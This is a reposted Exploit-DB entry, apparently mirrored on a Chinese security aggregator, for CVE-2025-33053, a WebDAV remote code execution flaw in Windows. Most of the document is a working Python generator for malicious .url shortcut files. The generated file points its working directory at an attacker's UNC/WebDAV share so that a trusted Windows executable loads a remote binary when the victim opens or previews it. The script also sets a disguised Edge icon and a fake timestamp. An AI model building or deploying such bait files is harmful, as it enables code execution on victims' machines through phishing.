[remote] WebDAV Windows 10 - Remote Code Execution (RCE)
该漏洞利用Windows .URL文件特性,在受害者打开或预览时通过UNC/WebDAV路径远程执行代码,无需用户交互。 2025-6-15 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:21 收藏 
Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE)
Date: June 2025
Author: Dev Bui Hieu
Tested on: Windows 10, Windows 11
Platform: Windows
Type: Remote
CVE: CVE-2025-33053

Description:
This exploit leverages the behavior of Windows .URL files to execute a
remote binary over a UNC path. When a victim opens or previews the .URL
file (e.g. from email), the system may automatically reach out to the
specified path (e.g. WebDAV or SMB share), leading to arbitrary code
execution without prompt.

```bash
python3 gen_url.py --ip 192.168.1.100 --out doc.url
```

import argparse

def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
    content = f"""[InternetShortcut]
URL={url_target}
WorkingDirectory={working_directory}
ShowCommand=7
IconIndex={icon_index}
IconFile={icon_file}
Modified={modified}
"""
    with open(output_file, "w", encoding="utf-8") as f:
        f.write(content)
    print(f"[+] .url file created: {output_file}")

def main():
    parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)")
    
    parser.add_argument('--out', default="bait.url", help="Output .url file name")
    parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path")
    parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)")
    parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe",
                        help="Target executable path on victim machine")
    parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                        help="Icon file path")
    parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)")
    parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)")

    args = parser.parse_args()

    working_directory = fr"\\{args.ip}\{args.share}\\"

    generate_url_file(
        output_file=args.out,
        url_target=args.exe,
        working_directory=working_directory,
        icon_file=args.icon,
        icon_index=args.index,
        modified=args.modified
    )

if __name__ == "__main__":
    main()

文章来源: https://www.exploit-db.com/exploits/52334
如有侵权请联系:admin#unsafe.sh